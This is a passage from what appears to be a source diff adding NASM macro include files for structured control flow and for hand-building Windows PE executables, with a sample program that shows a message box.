Jmp %$$$$$Begin,-1
%elifdef %$$$$$$BeginEnd
Jmp %$$$$$$Begin,-1
%elifdef %$$$$$$$BeginEnd
Jmp %$$$$$$$Begin,-1
%elifdef %$$$$$$$$BeginEnd
Jmp %$$$$$$$$Begin,-1
%elifdef %$$$$$$$$$BeginEnd
Jmp %$$$$$$$$$Begin,-1
%elifdef %$$$$$$$$$$BeginEnd
Jmp %$$$$$$$$$$Begin,-1
%else
Error LANGUAGE,Continue => 10 blocs maximum
%endif
%endmacro
%macro Break 0
%ifdef %$BeginEnd
Jmp %$End,+1
%elifdef %$$BeginEnd
Jmp %$$End,+1
%elifdef %$$$BeginEnd
Jmp %$$$End,+1
%elifdef %$$$$BeginEnd
Jmp %$$$$End,+1
%elifdef %$$$$$BeginEnd
Jmp %$$$$$End,+1
%elifdef %$$$$$$BeginEnd
Jmp %$$$$$$End,+1
%elifdef %$$$$$$$BeginEnd
Jmp %$$$$$$$End,+1
%elifdef %$$$$$$$$BeginEnd
Jmp %$$$$$$$$End,+1
%elifdef %$$$$$$$$$BeginEnd
Jmp %$$$$$$$$$End,+1
%elifdef %$$$$$$$$$$BeginEnd
Jmp %$$$$$$$$$$End,+1
%else
Error LANGUAGE,Break => 10 blocs maximum
%endif
%endmacro
;==================================== If =====================================
%macro IfJmp 4+
MultiParams %1
%if MultiParams_Ret==1
Cmp %1,%3
%else
%1
Cmp eax,%3
%endif
%ifidni %2,==
JX e,%4
%elifidni %2,!=
JX ne,%4
%elifidni %2,<
JX b,%4
%elifidni %2,>
JX a,%4
%elifidni %2,<=
JX be,%4
%elifidni %2,>=
JX ae,%4
%else
Error LANGUAGE,IfJmp v1,condition,v2,label
%endif
%endmacro
%macro IfNotJmp 4+
MultiParams %1
%if MultiParams_Ret==1
Cmp %1,%3
%else
%1
Cmp eax,%3
%endif
%ifidni %2,==
JX ne,%4
%elifidni %2,!=
JX e,%4
%elifidni %2,<
JX ae,%4
%elifidni %2,>
JX be,%4
%elifidni %2,<=
JX a,%4
%elifidni %2,>=
JX b,%4
%else
Error LANGUAGE,IfNotJmp v1,condition,v2,label
%endif
%endmacro
%macro If 3
%push If
MultiParams %1
%if MultiParams_Ret==1
IfNotJmp %1,%2,%3,%$If_Not,+1
%else
IfNotJmp {%1},%2,%3,%$If_Not,+1
%endif
%endmacro
%macro IfX 1
%push If
JnX %1,%$If_Not,+1
%endmacro
%macro Else 0
%ifctx If
Jmp %$If_End,+1
%$If_Not:
%repl Else
%else
Error LANGUAGE,Else => If | IfX
%endif
%endmacro
%macro EndIf 0
%ifctx If
%$If_Not:
%pop
%elifctx Else
%$If_End:
%pop
%else
Error LANGUAGE,EndIf => If | IfX | Else
%endif
%endmacro
;================================== Switch ===================================
%macro Switch 1
%push Switch
%define %$BeginEnd
%define %$Switch_V_Define %1
%$Begin:
%endmacro
%macro Case 1
%ifdef %$Switch_NeedEndIf_Define
EndIf
%endif
%ifctx Switch
If %$Switch_V_Define,==,%1
%define %$Switch_NeedEndIf_Define
%else
Error LANGUAGE,Case => Switch
%endif
%endmacro
%macro Default 0
%ifdef %$Switch_NeedEndIf_Define
EndIf
%endif
%ifctx Switch
%else
Error LANGUAGE,Default => Switch
%endif
%endmacro
%macro EndSwitch 0
%ifdef %$Switch_NeedEndIf_Define
EndIf
%endif
%ifctx Switch
%$End:
%pop
%else
Error LANGUAGE,EndSwitch => Switch
%endif
%endmacro
;================================== While ====================================
%macro While 0-3
%push While
%define %$BeginEnd
%$Begin:
%if %0!=0
MultiParams %1
%if MultiParams_Ret==1
IfNotJmp %1,%2,%3,%$End,+1
%else
IfNotJmp {%1},%2,%3,%$End,+1
%endif
%endif
%endmacro
%macro EndWhile 0-3
%ifctx While
%if %0!=0
MultiParams %1
%if MultiParams_Ret==1
IfJmp %1,%2,%3,%$Begin,-1
%else
IfJmp {%1},%2,%3,%$Begin,-1
%endif
%else
Continue
%endif
%$End:
%pop
%else
Error LANGUAGE,EndWhile => While
%endif
%endmacro
;================================== Until ====================================
%macro Until 0-3
%push Until
%define %$BeginEnd
%$Begin:
%if %0!=0
MultiParams %1
%if MultiParams_Ret==1
IfJmp %1,%2,%3,%$End,+1
%else
IfJmp {%1},%2,%3,%$End,+1
%endif
%endif
%endmacro
%macro EndUntil 0-3
%ifctx Until
%if %0!=0
MultiParams %1
%if MultiParams_Ret==1
IfNotJmp %1,%2,%3,%$Begin,-1
%else
IfNotJmp {%1},%2,%3,%$Begin,-1
%endif
%else
Continue
%endif
%$End:
%pop
%else
Error LANGUAGE,EndUntil => Until
%endif
%endmacro
;=================================== For =====================================
%macro For 5
%push For
%define %$BeginEnd
%define %$For_1_Define %1
%define %$For_5_Define %5
Mov %1,%2
%$Begin:
MultiParams %1
%if MultiParams_Ret==1
IfNotJmp %1,%3,%4,%$End,+1
%else
IfNotJmp {%1},%3,%4,%$End,+1
%endif
%endmacro
%macro EndFor 0
%ifctx For
%if %$For_5_Define>0
Add %$For_1_Define,%$For_5_Define
%elif %$For_5_Define<0
Sub %$For_1_Define,-%$For_5_Define
%else
%endif
Continue
%$End:
%pop
%else
Error LANGUAGE,EndFor => For
%endif
%endmacro
%endif

54
external/source/shellcode/windows/templates/inc/nasm.inc vendored Normal file
View File

@ -0,0 +1,54 @@
; GENERAL MACROS FOR NASM v1.0a
; =============================
;NASM.INC_NO_WARNING => ne pas afficher les warnings utilisateurs
;Error include(sans .INC),message
;Warning include(sans .INC),message
;MultiParams p
; -> MultiParams_Ret = nombre de paramètres
;================================= General ===================================
%ifndef _NASM.INC
%define _NASM.INC
%push _NASM.INC ;pour éviter erreurs %ifctx
%macro NASM.INC 0
%undef NASM.INC_NO_WARNING
%assign ErrorWarning_Assign 0
%endmacro
%macro NASM.INC~ 0
NASM.INC
%endmacro
NASM.INC
%macro Error 2+
ErrorWarningNext
%error %1.INC error: %2
%endmacro
%macro Warning 2+
%ifndef NASM.INC_NO_WARNING
ErrorWarningNext
%error %1.INC warning: %2
%endif
%endmacro
%macro ErrorWarningNext 0
%assign ErrorWarning_Assign ErrorWarning_Assign+1
%if ErrorWarning_Assign==1
%error ===============================================
%endif
%endmacro
%macro MultiParams 1-*
%define MultiParams_Ret %0
%endmacro
%endif

112
external/source/shellcode/windows/templates/inc/pe.asm vendored Normal file
View File

@ -0,0 +1,112 @@
; PE FILE STRUCTURE
; =================
%include "pe.inc"
BIN_Begin
MZHeader
MZExtendedHeader
MZSection.text_Begin
push cs
pop ds
mov dx,MZSection.text_VA(text_string)
mov ah,09
int 21h
mov ax,4C01h
int 21h
text_string: db 'This program cannot be run in DOS mode.',0Dh,0Ah,'$'
MZSection.text_End
PEHeader
%define PEOptionalheader_EipRVA PESection.text_RVA(mondebut)
PEOptionalHeader_Begin
PEOptionalHeader_Directory Export,0,0
PEOptionalHeader_Directory Import,Import_Directorys_RVA,Import_Directorys_VS
; PEOptionalHeader_Directory Resource,0,0
; PEOptionalHeader_Directory Exception,0,0
; PEOptionalHeader_Directory Security,0,0
; PEOptionalHeader_Directory Relocations,0,0
; PEOptionalHeader_Directory Debug,0,0
; PEOptionalHeader_Directory ImageDescription,0,0
; PEOptionalHeader_Directory MachineSpecific,0,0
; PEOptionalHeader_Directory ThreadLocalStorage,0,0
PEOptionalHeader_End
PESectionHeader .text,'.text',PESectionHeader_Flags_EXECUTABLECODE | PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_EXECUTEACCESS | PESectionHeader_Flags_READACCESS
PESectionHeader .rdata,'.rdata',PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_READACCESS
PESectionHeader .data,'.data',PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_READACCESS | PESectionHeader_Flags_WRITEACCESS
PESectionHeader .bss,'.bss', PESectionHeader_Flags_DATA0 | PESectionHeader_Flags_READACCESS | PESectionHeader_Flags_WRITEACCESS
PESectionHeader .idata,'.idata',PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_READACCESS
PESections_Begin
PESection.text_Begin
int 03h
mondebut:
MB_OK equ 0
mov eax,MB_OK
push eax
mov eax,PESection.rdata_VA(message)
call [GetCommandLineA]
push eax
push eax
mov eax,0
push eax
call [MessageBoxA]
call [PESection.idata_VA(Import.KERNEL32.ExitProcess)]
mov [PESection.text_VA(text1)],eax
mov [PESection.rdata_VA(rdata1)],ebx
mov [PESection.data_VA(data1)],ecx
mov [PESection.bss_VA(bss1)],edx
text1:
jmp short mondebut
PESection.text_End
PESection.rdata_Begin
message: db "coucou",0
rdata1: times 1001h db 22h ;db 'data1'
PESection.rdata_End
PESection.data_Begin
data1: times 1205h db 0FEh
PESection.data_End
PESection.bss_Begin
bss1: resb 1001h
PESection.bss_End
PESection.idata_Begin
Import_Directorys_Begin .idata
Import_Directory KERNEL32
Import_Directory USER32
Import_Directorys_End
Import_RVAs_Begin KERNEL32
Import_RVA KERNEL32,GetCommandLineA
Import_RVA KERNEL32,ExitProcess
Import_RVAs_End
Import_RVAs_Begin USER32
Import_RVA USER32,MessageBoxA
Import_RVAs_End
Import_VAs_Begin KERNEL32
Import_VA KERNEL32,GetCommandLineA,0BFF8C5ACh
Import_VA KERNEL32,ExitProcess,0BFF8D4CAh
Import_VAs_End
Import_VAs_Begin USER32
Import_VA USER32,MessageBoxA
Import_VAs_End
Import_Strings_Begin KERNEL32
Import_String_Function KERNEL32,GetCommandLineA,"GetCommandLineA",0D0h
Import_String_Function KERNEL32,ExitProcess,"ExitProcess",07Fh
Import_String_Dll KERNEL32,"KERNEL32.DLL"
Import_Strings_End
Import_Strings_Begin USER32
Import_String_Function USER32,MessageBoxA,"MessageBoxA"
Import_String_Dll USER32,"USER32.DLL"
Import_Strings_End
PESection.idata_End
PESections_End
BIN_End

654
external/source/shellcode/windows/templates/inc/pe.inc vendored Normal file
View File

@ -0,0 +1,654 @@
;corriger ;???
;raison inconnue ; ?
;gestion message d'erreur structures (%error)
; %define et %ifdef pour tester l'existence de header ncessaires
; (pour viter les erreurs de label indfinis)
;.edata,.rsrc (icones)
;supprimer macro Directories ? (calcul automatique ?)
; MACROS AND DEFINITIONS FOR PE FILES v1.0a
; =========================================
;By rix-shogun-agressor (erix@mail.dotcom.fr,rix@dreamnet.org)
;conventions:
;xxx_VA: adresse virtuelle (adresse en mmoire)
;xxx_RVA: dplacement d'adresse virtuel (offset d'adresse en mmoire%baseVA)
;xxx_VS: taille virtuelle (taille en mmoire)
;xxx_FS: taille fichier
;xxx_FA: adresse fichier (offset dans le fichier)
;xxx_Fa: file alignement
;xxx-Va: virtual alignement (alignement mmoire)
;xxx_Assign: assignation pour un calcul valu plus tard
;xxx_Define: definition pour un calcul valu plus tard dont une des valeurs
; est toujours inconnue
;xxx_Ifctx: macros pour regrouper plusieurs %ifctx
;xxx: valeur
;sections: text,
;macros de dfinitions des header: NOM[SousNom]_Begin NOM[SousNom]_End
; ou bien: NOM[SousNom]
;define de dfinitions des headers: NOM[SousNom]_Xxx
;definition de constantes des header: NOM[SousNom]_XXX
;nom interne aux macros NOMHeader NOM[SousNom]_Begin_FA NOM[SousNom]_End_FA
;MacroXXX:macros internes
;xxxx:normal
;xxxxa:align (V=>align virtuel,F=>align fichier)
;equ: valeur calcule d'aprŠs nombres suivants l'endroit de stockage
;%define: dclaration des constantes utilisables par l'utilisateur
;%assign: dclaration des variables internes pour les calculs d'equ (_Assign)
;================================= BIN Begin =================================
%ifndef PE.INC
%define PE.INC
%push PE.INC
%include "language.inc"
%macro BIN_Begin 0
SECTION .text
BIN_Begin_FA:
%push BIN_Begin
%endmacro
;================================= MZ Header =================================
%define MZHeader_MinimumMemory 0 ;en paragraphes, ajouter en fin de mmoire
%define MZHeader_MaximumMemory 0FFFFh ;en paragraphes, ajouter en fin de mmoire
%define MZHeader_Ss 0000h
%define MZHeader_Sp 00B8h ; ?
%define MZHeader_Ip 0000h
%define MZHeader_Cs 0000h
%macro MZHeader 0
%ifctx BIN_Begin
BITS 16
MZHeader_Begin_FA:
MZHeader_Signature_FA: db 'MZ'
MZHeader_LastPageBytes_FA: dw (BIN_End_FAa-BIN_Begin_FA) % 512
MZHeader_PagesNumber_FA: dw (BIN_End_FAa-BIN_Begin_FA)/512+1
MZHeader_RelocationsNumber_FA: dw 0
MZHeader_HeaderParagraphsNumber_FA: dw (MZExtendedHeader_End_FA-MZHeader_Begin_FA)/16
MZHeader_MinimumMemory_FA: dw MZHeader_MinimumMemory
MZHeader_MaximumMemory_FA: dw MZHeader_MaximumMemory
MZHeader_Ss_FA: dw MZHeader_Ss
MZHeader_Sp_FA: dw MZHeader_Sp
MZHeader_Checksum_FA: dw 0
MZHeader_Ip_FA: dw MZHeader_Ip
MZHeader_Cs_FA: dw MZHeader_Cs
MZHeader_RelocationTableFA_FA: dw 0040h ;0040h=>fichier PE
MZHeader_OverlayNumber_FA: dw 0
MZHeader_End_FA:
%repl MZHeader
%else
%error PE.INC error: MZHeader => BIN_Begin
%endif
%endmacro
;============================ MZ Extended Header =============================
%macro MZExtendedHeader 0
%ifctx MZHeader
MZExtendedHeader_Begin_FA:
dd 0
dw 0
%rep 26
db 0
%endrep
MZExtendedHeader_PEHeaderFA_FA: dd PEHeader_Begin_FA
MZExtendedHeader_End_FA:
%repl MZExtendedHeader
%else
%error PE.INC error: MZExtendedHeader => MZHeader
%endif
%endmacro
;================================== MZ Text ==================================
%macro MZSection.text_Begin 0
%ifctx MZExtendedHeader
MZSection.text_Begin_FA:
%define MZSection.text_VA(a) (a)-MZSection.text_Begin_FA
%repl MZSection.text_Begin
%else
%error PE.INC error: MZSection.text_Begin => MZExtendedHeader
%endif
%endmacro
%macro MZSection.text_End 0
%ifctx MZSection.text_Begin
MZSection.text_End_FA:
DbAlign MZSection.text_Begin_FA,16
MZSection.text_End_FAa:
%repl MZSection.text_End
%else
%error PE.INC error: MZSection.text_End => MZSection.text_Begin
%endif
%endmacro
;================================= PE Header =================================
%define PEHeader_Machine_386 14Ch
%define PEHeader_Machine_486 14Dh
%define PEHeader_Machine_PENTIUM 14Eh
%define PEHeader_Machine PEHeader_Machine_386
%define PEHeader_DateHour 0
%define PEHeader_OptionalHeaderFS 0E0h ; ?
%define PEHeader_Characteristics_NORELOCATIONS 0000000000000001b
%define PEHeader_Characteristics_EXECUTABLEIMAGE 0000000000000010b ;excutable/librairie
%define PEHeader_Characteristics_16B 0000000001000000b ;programme 16 bits
%define PEHeader_Characteristics_BYTESREVERSEDLOW 0000000010000000b
%define PEHeader_Characteristics_32B 0000000100000000b ;programme 32 bits
%define PEHeader_Characteristics_NODEBUGINFORMATIONS 0000001000000000b
%define PEHeader_Characteristics_SYSTEMFILE 0001000000000000b
%define PEHeader_Characteristics_DLL 0010000000000000b
%define PEHeader_Characteristics_BYTESREVERSEDHIGH 1000000000000000b
%define PEHeader_Characteristics PEHeader_Characteristics_NORELOCATIONS | PEHeader_Characteristics_EXECUTABLEIMAGE | PEHeader_Characteristics_32B
%macro PEHeader 0
%ifctx MZSection.text_End
BITS 32
PEHeader_Begin_FA:
PEHeader_Signature_FA: db 'PE',00h,00h
PEHeader_Machine_FA: dw PEHeader_Machine
PEHeader_SectionsNumber_FA: dw PEHeader_SectionsNumber
%assign PEHeader_SectionsNumber_Assign 0
PEHeader_DateHour_FA: dd PEHeader_DateHour
dd 0
dd 0
PEHeader_OptionalHeaderFS_FA: dw PEHeader_OptionalHeaderFS
PEHeader_Characteristics_FA: dw PEHeader_Characteristics
PEHeader_End_FA:
%define PESection_RVA(a) PESectionCur_RVAa_Assign+(a)-PESectionCur_FAa_Define
%define PESection.text_RVA(a) PESection.text_RVAa+(a)-PESection.text_Begin_FAa
%define PESection.rdata_RVA(a) PESection.rdata_RVAa+(a)-PESection.rdata_Begin_FAa
%define PESection.data_RVA(a) PESection.data_RVAa+(a)-PESection.data_Begin_FAa
%define PESection.bss_RVA(a) PESection.bss_RVAa+(a)-PESection.bss_Begin_FAa
%define PESection.idata_RVA(a) PESection.idata_RVAa+(a)-PESection.idata_Begin_FAa
%repl PEHeader
%else
%error PE.INC error: PEHeader => MZSection.text_End
%endif
%endmacro
;============================ PE Optional Header =============================
%define PEOptionalHeader_MajorLinkerVersion 0
%define PEOptionalHeader_MinorLinkerVersion 0
%define PEOptionalheader_EipRVA PESection.text_RVA(PESection.text_Begin_FAa)
%define PEOptionalHeader_ImageVAa 00400000h
%define PEOptionalHeader_Va 1000h
%define PEOptionalHeader_Fa 200h
%define PEOptionalHeader_MajorOSVersion 4
%define PEOptionalHeader_MinorOSVersion 0
%define PEOptionalHeader_MajorProgramVersion 0
%define PEOptionalHeader_MinorProgramVersion 0
%define PEOptionalHeader_MajorSubSystemVersion 4
%define PEOptionalHeader_MinorSubSystemVersion 0
%define PEOptionalHeader_SubSystem_DRIVER 1
%define PEOptionalHeader_SubSystem_GUI 2
%define PEOptionalHeader_SubSystem_CONSOLE 3
%define PEOptionalHeader_SubSystem_POSIX 7
%define PEOptionalHeader_SubSystem PEOptionalHeader_SubSystem_GUI
%define PEOptionalHeader_DllFlags_NOTIFYPROCESSATTACHMENTS 0001b
%define PEOptionalHeader_DllFlags_NOTIFYPROCESSDETACHMENTS 0010b
%define PEOptionalHeader_DllFlags_NOTIFYTHREADSATTACHMENTS 0100b
%define PEOptionalHeader_DllFlags_NOTIFYTHREADSDETACHMENTS 1000b
%define PEOptionalHeader_DllFlags 0
%define PEOptionalHeader_ReservedStackVSa 0
%define PEOptionalHeader_CommittedStackVSa 0
%define PEOptionalHeader_ReservedHeapVSa 0
%define PEOptionalHeader_CommittedHeapVSa 0
%macro PEOptionalHeader_Begin 0
%ifctx PEHeader
PEOptionalHeader_Begin_FA:
PEOptionalHeader_Signature_FA: db 0Bh,01h
PEOptionalHeader_MajorLinkerVersion_FA: db PEOptionalHeader_MajorLinkerVersion
PEOptionalHeader_MinorLinkerVersion_FA: db PEOptionalHeader_MinorLinkerVersion
PEOptionalHeader_CodeFSa_FA: dd PESection.text_FSa
PEOptionalHeader_InitializedDataFSa_FA: dd PEOptionalHeader_InitializedDataFSa
%assign PEOptionalHeader_InitializedDataFSa_Assign 0
PEOptionalHeader_UninitializedDataVSa_FA: dd PESection.bss_VSa
PEOptionalHeader_EipRVA_FA: dd PEOptionalheader_EipRVA
PEOptionalHeader_CodeRVAa_FA: dd PESection.text_RVAa
%assign PEOptionalHeader_DataRVAa_Assign 0
PEOptionalHeader_DataRVAa_FA: dd PEOptionalHeader_DataRVAa ; ?
PEOptionalHeader_ImageVAa_FA: dd PEOptionalHeader_ImageVAa
PEOptionalHeader_Va_FA: dd PEOptionalHeader_Va
PEOptionalHeader_Fa_FA: dd PEOptionalHeader_Fa
PEOptionalHeader_MajorOSVersion_FA: dw PEOptionalHeader_MajorOSVersion
PEOptionalHeader_MinorOSVersion_FA: dw PEOptionalHeader_MinorOSVersion
PEOptionalHeader_MajorProgramVersion_FA: dw PEOptionalHeader_MajorProgramVersion
PEOptionalHeader_MinorProgramVersion_FA: dw PEOptionalHeader_MinorProgramVersion
PEOptionalHeader_MajorSubSystemVersion_FA: dw PEOptionalHeader_MajorSubSystemVersion
PEOptionalHeader_MinorSubSystemVersion_FA: dw PEOptionalHeader_MinorSubSystemVersion
dd 0
PEOptionalHeader_ImageVSa_FA: dd PEOptionalHeader_ImageVSa
PEOptionalHeader_HeadersFSa_FA: dd PESections_Begin_FAa-BIN_Begin_FA
PEOptionalHeader_Checksum_FA: dd 0
PEOptionalHeader_SubSystem_FA: dw PEOptionalHeader_SubSystem
PEOptionalHeader_DllFlags_FA: dw PEOptionalHeader_DllFlags
PEOptionalHeader_ReservedStackVSa_FA: dd PEOptionalHeader_ReservedStackVSa ;???
PEOptionalHeader_CommittedStackVSa_FA: dd PEOptionalHeader_CommittedStackVSa ;???
PEOptionalHeader_ReservedHeapVSa_FA: dd PEOptionalHeader_ReservedHeapVSa ;???
PEOptionalHeader_CommittedHeapVSa_FA: dd PEOptionalHeader_CommittedHeapVSa ;???
dd 0
PEOptionalHeader_DirectoriesNumber_FA: dd PEOptionalHeader_DirectoriesNumber
%assign PEOptionalHeader_DirectoriesNumber_Assign 0
%repl PEOptionalHeader_Begin
%else
%error PE.INC error: PEOptionalHeader_Begin => PEHeader
%endif
%endmacro
;PEOptionalHeader_Directory name,RVA,FS
%macro PEOptionalHeader_Directory 3
%ifctx PEOptionalHeader_Begin
PEOptionalHeader%1RVA_FA: dd %2
PEOptionalHeader%1FS_FA: dd %3
%assign PEOptionalHeader_DirectoriesNumber_Assign PEOptionalHeader_DirectoriesNumber_Assign+1
%else
%error PE.INC error: PEOptionalHeader_Directory => PEOptionalHeader_Begin
%endif
%endmacro
%macro PEOptionalHeader_End 0
%ifctx PEOptionalHeader_Begin
PEOptionalHeader_End_FA:
DbAlign PEOptionalHeader_Begin_FA,PEHeader_OptionalHeaderFS
PEOptionalHeader_End_FAa:
PEOptionalHeader_DirectoriesNumber equ PEOptionalHeader_DirectoriesNumber_Assign
%repl PEOptionalHeader_End
%else
%error PE.INC error: PEOptionalHeader_End => PEOptionalHeader_Begin
%endif
%endmacro
;============================= PE Section Header =============================
%define PESectionHeader_Flags_EXECUTABLECODE 00000000000000000000000000100000b
%define PESectionHeader_Flags_DATAFROMFILE 00000000000000000000000001000000b
%define PESectionHeader_Flags_DATA0 00000000000000000000000010000000b
%define PESectionHeader_Flags_COMMENTS 00000000000000000000001000000000b
%define PESectionHeader_Flags_COMMONBLOCKDATA 00000000000000000001000000000000b
%define PESectionHeader_Flags_FARDATA 00000000000000001000000000000000b
%define PESectionHeader_Flags_PURGEABLEDATA 00000000000000100000000000000000b
%define PESectionHeader_Flags_NONMOVABLEDATA 00000000000001000000000000000000b
%define PESectionHeader_Flags_SHAREDINSTANCES 00010000000000000000000000000000b ;.text
%define PESectionHeader_Flags_EXECUTEACCESS 00100000000000000000000000000000b
%define PESectionHeader_Flags_READACCESS 01000000000000000000000000000000b
%define PESectionHeader_Flags_WRITEACCESS 10000000000000000000000000000000b
;PESectionHeader .name,'.name',flags
%macro PESectionHeader 3
%ifctx PEOptionalHeader_End
PESectionHeader%1_Name_FA: db %2
DbAlign PESectionHeader%1_Name_FA,8
PESectionHeader%1_VS_FA: dd PESection%1_VS
PESectionHeader%1_RVAa_FA: dd PESection%1_RVAa
PESectionHeader%1_FSa_FA: dd PESection%1_FSa
PESectionHeader%1_FAa_FA: dd PESectionHeader%1_FAa
dd 0
dd 0
dw 0
dw 0
PESectionHeader%1_Flags_FA: dd %3
%else
%error PE.INC error: PESectionHeader => PEOptionalHeader_End
%endif
%endmacro
;================================ PE Sections ================================
%macro PESections_Begin 0
%ifctx PEOptionalHeader_End
PESections_Begin_FA:
DbAlign BIN_Begin_FA,PEOptionalHeader_Fa
PESections_Begin_FAa:
%assign PESectionPrec_FSa_Assign PESections_Begin_FAa-BIN_Begin_FA
%assign PESectionPrec_RVAa_Assign 0
%assign PESectionCur_RVAa_Assign 0
%define PESectionCur_FAa_Define 0
;impossible dans MacroPESection_Begin
%define PESection_VA(a) PEOptionalHeader_ImageVAa+PESectionCur_RVAa_Assign+(a)-PESectionCur_FAa_Define
%define PESection.text_VA(a) PEOptionalHeader_ImageVAa+PESection.text_RVAa+(a)-PESection.text_Begin_FAa
%define PESection.rdata_VA(a) PEOptionalHeader_ImageVAa+PESection.rdata_RVAa+(a)-PESection.rdata_Begin_FAa
%define PESection.data_VA(a) PEOptionalHeader_ImageVAa+PESection.data_RVAa+(a)-PESection.data_Begin_FAa
%define PESection.bss_VA(a) PEOptionalHeader_ImageVAa+PESection.bss_RVAa+(a)-PESection.bss_Begin_FAa
%define PESection.idata_VA(a) PEOptionalHeader_ImageVAa+PESection.idata_RVAa+(a)-PESection.idata_Begin_FAa
%repl PESections_Begin
%else
%error PE.INC error: PESections_Begin => PEOptionalHeader
%endif
%endmacro
;MacroPESection_End .name
%macro MacroPESection_End 1
PESection%1_End_FA:
DbAlign BIN_Begin_FA,PEOptionalHeader_Fa
PESection%1_End_FAa:
%assign PEHeader_SectionsNumber_Assign PEHeader_SectionsNumber_Assign+1
PESection%1_VS equ PESection%1_End_FA-PESection%1_Begin_FAa
%endmacro
%macro PESection.text_Begin 0
%ifctx PESections_Begin
%assign PESectionCur_RVAa_Assign (((PESectionPrec_RVAa_Assign+PESectionPrec_FSa_Assign-1)/PEOptionalHeader_Va)+1)*PEOptionalHeader_Va
PESection.text_Begin_FAa:
%define PESectionCur_FAa_Define PESection.text_Begin_FAa
%push PESection.text_Begin
%else
%error PE.INC error: PESection.text_Begin => PESections_Begin
%endif
%endmacro
%macro PESection.text_End 0
%ifctx PESection.text_Begin
MacroPESection_End .text
%assign PESectionPrec_RVAa_Assign PESectionCur_RVAa_Assign
PESection.text_RVAa equ PESectionPrec_RVAa_Assign
PESection.text_FSa equ PESection.text_End_FAa-PESection.text_Begin_FAa
%assign PESectionPrec_FSa_Assign PESection.text_FSa
PESectionHeader.text_FAa equ PESection.text_Begin_FAa
%pop
%else
%error PE.INC error: PESection.text_End => PESection.text_Begin
%endif
%endmacro
%macro PESection.rdata_Begin 0
%ifctx PESections_Begin
%assign PESectionCur_RVAa_Assign (((PESectionPrec_RVAa_Assign+PESectionPrec_FSa_Assign-1)/PEOptionalHeader_Va)+1)*PEOptionalHeader_Va
PESection.rdata_Begin_FAa:
%define PESectionCur_FAa_Define PESection.rdata_Begin_FAa
%push PESection.rdata_Begin
%else
%error PE.INC error: PESection.rdata_Begin => PESections_Begin
%endif
%endmacro
%macro PESection.rdata_End 0
%ifctx PESection.rdata_Begin
MacroPESection_End .rdata
%assign PESectionPrec_RVAa_Assign PESectionCur_RVAa_Assign
PESection.rdata_RVAa equ PESectionPrec_RVAa_Assign
PESection.rdata_FSa equ PESection.rdata_End_FAa-PESection.rdata_Begin_FAa
%assign PESectionPrec_FSa_Assign PESection.rdata_FSa
PESectionHeader.rdata_FAa equ PESection.rdata_Begin_FAa
%assign PEOptionalHeader_InitializedDataFSa_Assign PEOptionalHeader_InitializedDataFSa_Assign+PESection.rdata_FSa
%if PEOptionalHeader_DataRVAa_Assign == 0
%assign PEOptionalHeader_DataRVAa_Assign PESection.rdata_RVAa
%endif
%pop
%else
%error PE.INC error: PESection.rdata_End => PESection.rdata_Begin
%endif
%endmacro
%macro PESection.data_Begin 0
%ifctx PESections_Begin
%assign PESectionCur_RVAa_Assign (((PESectionPrec_RVAa_Assign+PESectionPrec_FSa_Assign-1)/PEOptionalHeader_Va)+1)*PEOptionalHeader_Va
PESection.data_Begin_FAa:
%define PESectionCur_FAa_Define PESection.data_Begin_FAa
%push PESection.data_Begin
%else
%error PE.INC error: PESection.data_Begin => PESections_Begin
%endif
%endmacro
%macro PESection.data_End 0
%ifctx PESection.data_Begin
MacroPESection_End .data
%assign PESectionPrec_RVAa_Assign PESectionCur_RVAa_Assign
PESection.data_RVAa equ PESectionPrec_RVAa_Assign
PESection.data_FSa equ PESection.data_End_FAa-PESection.data_Begin_FAa
PESectionHeader.data_FAa equ PESection.data_Begin_FAa
%assign PESectionPrec_FSa_Assign PESection.data_FSa
%assign PEOptionalHeader_InitializedDataFSa_Assign PEOptionalHeader_InitializedDataFSa_Assign+PESection.data_FSa
%if PEOptionalHeader_DataRVAa_Assign == 0
%assign PEOptionalHeader_DataRVAa_Assign PESection.data_RVAa
%endif
%pop
%else
%error PE.INC error: PESection.data_End => PESection.data_Begin
%endif
%endmacro
%macro PESection.bss_Begin 0
%ifctx PESections_Begin
%assign PESectionCur_RVAa_Assign (((PESectionPrec_RVAa_Assign+PESectionPrec_FSa_Assign-1)/PEOptionalHeader_Va)+1)*PEOptionalHeader_Va
SECTION .bss
PESection.bss_Begin_FAa:
%define PESectionCur_FAa_Define PESection.bss_Begin_FAa
%push PESection.bss_Begin
%else
%error PE.INC error: PESection.bss_Begin => PESections_Begin
%endif
%endmacro
%macro PESection.bss_End 0
%ifctx PESection.bss_Begin
PESection.bss_End_FA:
ResbAlign PESection.bss_Begin_FAa,PEOptionalHeader_Va
PESection.bss_End_FAa:
%assign PEHeader_SectionsNumber_Assign PEHeader_SectionsNumber_Assign+1
PESection.bss_VS equ PESection.bss_End_FA-PESection.bss_Begin_FAa
PESection.bss_VSa equ PESection.bss_End_FAa-PESection.bss_Begin_FAa
SECTION .text
%assign PESectionPrec_RVAa_Assign PESectionCur_RVAa_Assign
PESection.bss_RVAa equ PESectionPrec_RVAa_Assign
PESection.bss_FSa equ 0
%assign PESectionPrec_FSa_Assign PESection.bss_VSa
PESectionHeader.bss_FAa equ 0
%pop
%else
%error PE.INC error: PESection.bss_End => PESection.bss_Begin
%endif
%endmacro
%macro PESection.idata_Begin 0
%ifctx PESections_Begin
%assign PESectionCur_RVAa_Assign (((PESectionPrec_RVAa_Assign+PESectionPrec_FSa_Assign-1)/PEOptionalHeader_Va)+1)*PEOptionalHeader_Va
PESection.idata_Begin_FAa:
%define PESectionCur_FAa_Define PESection.idata_Begin_FAa
%push PESection.idata_Begin
%else
%error PE.INC error: PESection.idata_Begin => PESections_Begin
%endif
%endmacro
%macro PESection.idata_End 0
%ifctx PESection.idata_Begin
MacroPESection_End .idata
%assign PESectionPrec_RVAa_Assign PESectionCur_RVAa_Assign
PESection.idata_RVAa equ PESectionPrec_RVAa_Assign
PESection.idata_FSa equ PESection.idata_End_FAa-PESection.idata_Begin_FAa
PESectionHeader.idata_FAa equ PESection.idata_Begin_FAa
%assign PESectionPrec_FSa_Assign PESection.idata_FSa
%pop
%else
%error PE.INC error: PESection.idata_End => PESection.idata_Begin
%endif
%endmacro
%macro PESection.rsrc_Begin 0
%ifctx PESections_Begin
